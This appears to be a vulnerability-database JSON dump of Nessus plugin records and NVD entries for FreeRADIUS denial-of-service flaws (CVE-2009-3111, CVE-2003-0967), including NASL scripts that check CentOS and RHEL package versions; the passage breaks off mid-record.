{"published": "2010-01-06T00:00:00", "id": "CENTOS_RHSA-2009-1451.NASL", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "history": [{"differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:01", "bulletin": {"enchantments": {}, "published": "2010-01-06T00:00:00", "id": "CENTOS_RHSA-2009-1451.NASL", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "history": [], "cpe": [], "hash": "12c04f4a73e31012b2d01b1bbc56804b4c53b45e4f0707a3a7a08e3bb23a8807", "description": "Updated freeradius packages that fix a security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote Authentication Dial In User Service (RADIUS) server, designed to allow centralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded specific RADIUS attributes from RADIUS packets. A remote attacker could use this flaw to crash the RADIUS daemon (radiusd) via a specially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, radiusd will be restarted automatically.", "type": "nessus", "pluginID": "43791", "lastseen": "2016-09-26T17:23:01", "edition": 1, "title": "CentOS 5 : freeradius (CESA-2009:1451)", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43791", "modified": "2015-05-19T00:00:00", "bulletinFamily": "scanner", "viewCount": 0, "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "references": ["http://www.nessus.org/u?76397f34", "http://www.nessus.org/u?c9242f54"], "naslFamily": "CentOS Local Security Checks", "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1451 and \n# CentOS Errata and Security Advisory 2009:1451 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43791);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2015/05/19 23:43:06 $\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_xref(name:\"RHSA\", value:\"2009:1451\");\n\n script_name(english:\"CentOS 5 : freeradius (CESA-2009:1451)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2009-October/016228.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?76397f34\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2009-October/016229.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c9242f54\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected freeradius packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2015 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "hashmap": [{"hash": "407696094c6e1bdb54a5dbc79e858e76", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5b29f0b6f3388552c355643a703bc4a5", "key": "sourceData"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "1137153b16a35725749f89b6c786264e", "key": "modified"}, {"hash": "19ca86738b30be48f850a49fa5f0e340", "key": "description"}, {"hash": "6141f07ed643366dfb6b5346be38b176", "key": "pluginID"}, {"hash": "205023e314fcea43f619b9b247d13e52", "key": "title"}, {"hash": "c89664dda9b69a61647694de5302139f", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "a0b45bffe04eee7309eae270275150ab", "key": "href"}, {"hash": "fd5b0ac2be0f5feddb6b303186cd9f6f", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "objectVersion": "1.2"}}], "description": "Updated freeradius packages that fix a security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote Authentication Dial In User Service (RADIUS) server, designed to allow centralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded specific RADIUS attributes from RADIUS packets. A remote attacker could use this flaw to crash the RADIUS daemon (radiusd) via a specially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, radiusd will be restarted automatically.", "hash": "3652513e44ffbf30f51e33e1b6064e8c3ad2f3004cbe4840480cf2a00e79d3ab", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "type": "nessus", "pluginID": "43791", "lastseen": "2017-10-29T13:32:51", "edition": 2, "cpe": ["p-cpe:/a:centos:centos:freeradius-unixODBC", "p-cpe:/a:centos:centos:freeradius-mysql", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:freeradius-postgresql", "p-cpe:/a:centos:centos:freeradius"], "title": "CentOS 5 : freeradius (CESA-2009:1451)", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43791", "modified": "2015-05-19T00:00:00", "bulletinFamily": "scanner", "viewCount": 0, "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "references": ["http://www.nessus.org/u?76397f34", "http://www.nessus.org/u?c9242f54"], "naslFamily": "CentOS Local Security Checks", "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1451 and \n# CentOS Errata and Security Advisory 2009:1451 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43791);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2015/05/19 23:43:06 $\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_xref(name:\"RHSA\", value:\"2009:1451\");\n\n script_name(english:\"CentOS 5 : freeradius (CESA-2009:1451)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2009-October/016228.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?76397f34\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2009-October/016229.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c9242f54\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected freeradius packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:freeradius-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2015 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "hashmap": [{"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "0ae154fb574aa425e96e0e03507a16d3", "key": "cpe"}, {"hash": "c89664dda9b69a61647694de5302139f", "key": "cvelist"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "19ca86738b30be48f850a49fa5f0e340", "key": "description"}, {"hash": "a0b45bffe04eee7309eae270275150ab", "key": "href"}, {"hash": "1137153b16a35725749f89b6c786264e", "key": "modified"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "6141f07ed643366dfb6b5346be38b176", "key": "pluginID"}, {"hash": "fd5b0ac2be0f5feddb6b303186cd9f6f", "key": "published"}, {"hash": "407696094c6e1bdb54a5dbc79e858e76", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5b29f0b6f3388552c355643a703bc4a5", "key": "sourceData"}, {"hash": "205023e314fcea43f619b9b247d13e52", "key": "title"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}], "objectVersion": "1.3"}

{"result": {"cve": [{"lastseen": "2017-10-11T11:05:51", "references": ["http://www.redhat.com/support/errata/RHSA-2003-386.html", "http://marc.info/?l=bugtraq&m=106935911101493&w=2", "http://marc.info/?l=freeradius-users&m=106947389449613&w=2", "http://marc.info/?l=bugtraq&m=106944220426970"], "description": "rad_decode in FreeRADIUS 0.9.2 and earlier allows remote attackers to cause a denial of service (crash) via a short RADIUS string attribute with a tag, which causes memcpy to be called with a -1 length argument, as demonstrated using the Tunnel-Password attribute.", "edition": 3, "reporter": "NVD", "published": "2003-12-15T00:00:00", "title": "CVE-2003-0967", "type": "cve", "enchantments": {"score": {"modified": "2017-10-11T11:05:51", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10917", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10917"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2003-0967"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10917", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10917"}], "modified": "2017-10-10T21:29:16", "cpe": ["cpe:/a:freeradius:freeradius:0.9.2"], "id": "CVE-2003-0967", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0967", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-19T13:36:37", "references": ["http://support.apple.com/kb/HT3937", "http://lists.apple.com/archives/security-announce/2009/Nov/msg00000.html", "http://www.openwall.com/lists/oss-security/2009/09/09/1", "http://lists.opensuse.org/opensuse-security-announce/2009-10/msg00001.html", "http://intevydis.com/vd-list.shtml", "http://www.redhat.com/support/errata/RHSA-2009-1451.html", "http://www.vupen.com/english/advisories/2009/3184", "http://www.securityfocus.com/bid/36263", "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00004.html", "http://github.com/alandekok/freeradius-server/commit/860cad9e02ba344edb0038419e415fe05a9a01f4"], "description": "The rad_decode function in FreeRADIUS before 1.1.8 allows remote attackers to cause a denial of service (radiusd crash) via zero-length Tunnel-Password attributes, as demonstrated by a certain module in VulnDisco Pack Professional 7.6 through 8.11. NOTE: this is a regression error related to CVE-2003-0967.", "edition": 2, "reporter": "NVD", "published": "2009-09-09T14:30:00", "title": "CVE-2009-3111", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:37", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9919", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9919"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-3111"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9919", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9919"}], "modified": "2017-09-18T21:29:28", "cpe": ["cpe:/a:freeradius:freeradius:1.1.6", "cpe:/a:freeradius:freeradius:0.8", "cpe:/a:freeradius:freeradius:0.8.1", "cpe:/a:freeradius:freeradius:1.0.4", "cpe:/a:freeradius:freeradius:0.2", "cpe:/a:freeradius:freeradius:1.0.5", "cpe:/a:freeradius:freeradius:0.9", "cpe:/a:freeradius:freeradius:1.1.0", "cpe:/a:freeradius:freeradius:1.1.5", "cpe:/a:freeradius:freeradius:1.0.3", "cpe:/a:freeradius:freeradius:1.0.2", "cpe:/a:freeradius:freeradius:1.0.0", "cpe:/a:freeradius:freeradius:0.5", "cpe:/a:freeradius:freeradius:1.0.1", "cpe:/a:freeradius:freeradius:1.1.7", "cpe:/a:freeradius:freeradius:0.4", "cpe:/a:freeradius:freeradius:0.9.3", "cpe:/a:freeradius:freeradius:0.9.2", "cpe:/a:freeradius:freeradius:0.3", "cpe:/a:freeradius:freeradius:0.9.1", "cpe:/a:freeradius:freeradius:1.1.3"], "id": "CVE-2009-3111", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3111", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2017-10-29T13:38:17", "references": ["https://www.redhat.com/security/data/cve/CVE-2003-0967.html", "http://marc.info/?l=freeradius-users&m=106947389449613", "http://rhn.redhat.com/errata/RHSA-2003-386.html"], "pluginID": "12437", "description": "Updated FreeRADIUS packages are now available that fix a denial of service vulnerability.\n\nFreeRADIUS is an Internet authentication daemon, which implements the RADIUS protocol. It allows Network Access Servers (NAS boxes) to perform authentication for dial-up users.\n\nThe rad_decode function in FreeRADIUS 0.9.2 and earlier allows remote attackers to cause a denial of service (crash) via a short RADIUS string attribute with a tag, which causes memcpy to be called with a\n-1 length argument, as demonstrated using the Tunnel-Password attribute. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2003-0967 to this issue.\n\nUsers of FreeRADIUS are advised to upgrade to these erratum packages containing FreeRADIUS 0.9.3 which is not vulnerable to these issues.", "edition": 3, "reporter": "Tenable", "published": "2004-07-06T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "RHEL 3 : freeradius (RHSA-2003:386)", "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967"], "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:freeradius"], "modified": "2016-12-28T00:00:00", "id": "REDHAT-RHSA-2003-386.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12437", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:386. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12437);\n script_version (\"$Revision: 1.21 $\");\n script_cvs_date(\"$Date: 2016/12/28 17:44:44 $\");\n\n script_cve_id(\"CVE-2003-0967\");\n script_xref(name:\"RHSA\", value:\"2003:386\");\n\n script_name(english:\"RHEL 3 : freeradius (RHSA-2003:386)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated FreeRADIUS packages are now available that fix a denial of\nservice vulnerability.\n\nFreeRADIUS is an Internet authentication daemon, which implements the\nRADIUS protocol. It allows Network Access Servers (NAS boxes) to\nperform authentication for dial-up users.\n\nThe rad_decode function in FreeRADIUS 0.9.2 and earlier allows remote\nattackers to cause a denial of service (crash) via a short RADIUS\nstring attribute with a tag, which causes memcpy to be called with a\n-1 length argument, as demonstrated using the Tunnel-Password\nattribute. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2003-0967 to this issue.\n\nUsers of FreeRADIUS are advised to upgrade to these erratum packages\ncontaining FreeRADIUS 0.9.3 which is not vulnerable to these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2003-0967.html\"\n );\n # http://marc.theaimsgroup.com/?l=freeradius-users&m=106947389449613\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=freeradius-users&m=106947389449613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2003-386.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected freeradius package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:386\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"freeradius-0.9.3-1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-29T13:41:02", "references": ["https://www.redhat.com/security/data/cve/CVE-2009-3111.html", "http://rhn.redhat.com/errata/RHSA-2009-1451.html"], "pluginID": "41008", "edition": 3, "description": "Updated freeradius packages that fix a security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote Authentication Dial In User Service (RADIUS) server, designed to allow centralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded specific RADIUS attributes from RADIUS packets. A remote attacker could use this flaw to crash the RADIUS daemon (radiusd) via a specially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, radiusd will be restarted automatically.", "reporter": "Tenable", "published": "2009-09-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "RHEL 5 : freeradius (RHSA-2009:1451)", "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "cpe": ["p-cpe:/a:redhat:enterprise_linux:freeradius-unixODBC", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:freeradius-mysql", "p-cpe:/a:redhat:enterprise_linux:freeradius", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:freeradius-postgresql"], "modified": "2017-01-03T00:00:00", "id": "REDHAT-RHSA-2009-1451.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41008", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1451. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41008);\n script_version (\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2017/01/03 17:27:02 $\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_xref(name:\"RHSA\", value:\"2009:1451\");\n\n script_name(english:\"RHEL 5 : freeradius (RHSA-2009:1451)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3111.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2009-1451.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius-unixODBC\");\n script_set_attribute(attribute:\"cpe\", 